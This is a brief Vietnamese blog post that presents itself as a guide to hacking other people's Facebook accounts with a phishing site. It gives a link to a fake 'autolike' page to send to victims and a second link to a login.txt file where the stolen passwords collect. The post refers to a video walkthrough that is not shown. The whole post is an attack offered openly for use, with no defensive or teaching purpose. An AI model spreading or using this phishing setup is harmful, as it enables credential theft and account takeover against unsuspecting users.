Hướng dẩn hack tài khoản facebook người khác

  Hướng dẩn hack tài khoản facebook người khác
-- Đây là cách hướng dẩn về 1 loại hack tài khoản facebook bằng hình thức dùng web lừa đảo !!

(video hướng dẩn )

-- cách bạn gởi link web lừa đảo cho nạn nhân : http://autolike.dichvuvn.com/
-- và thu thập password tại đây : http://autolike.dichvuvn.com/login.txt

5
4
3
2
1

No comments:

Post a Comment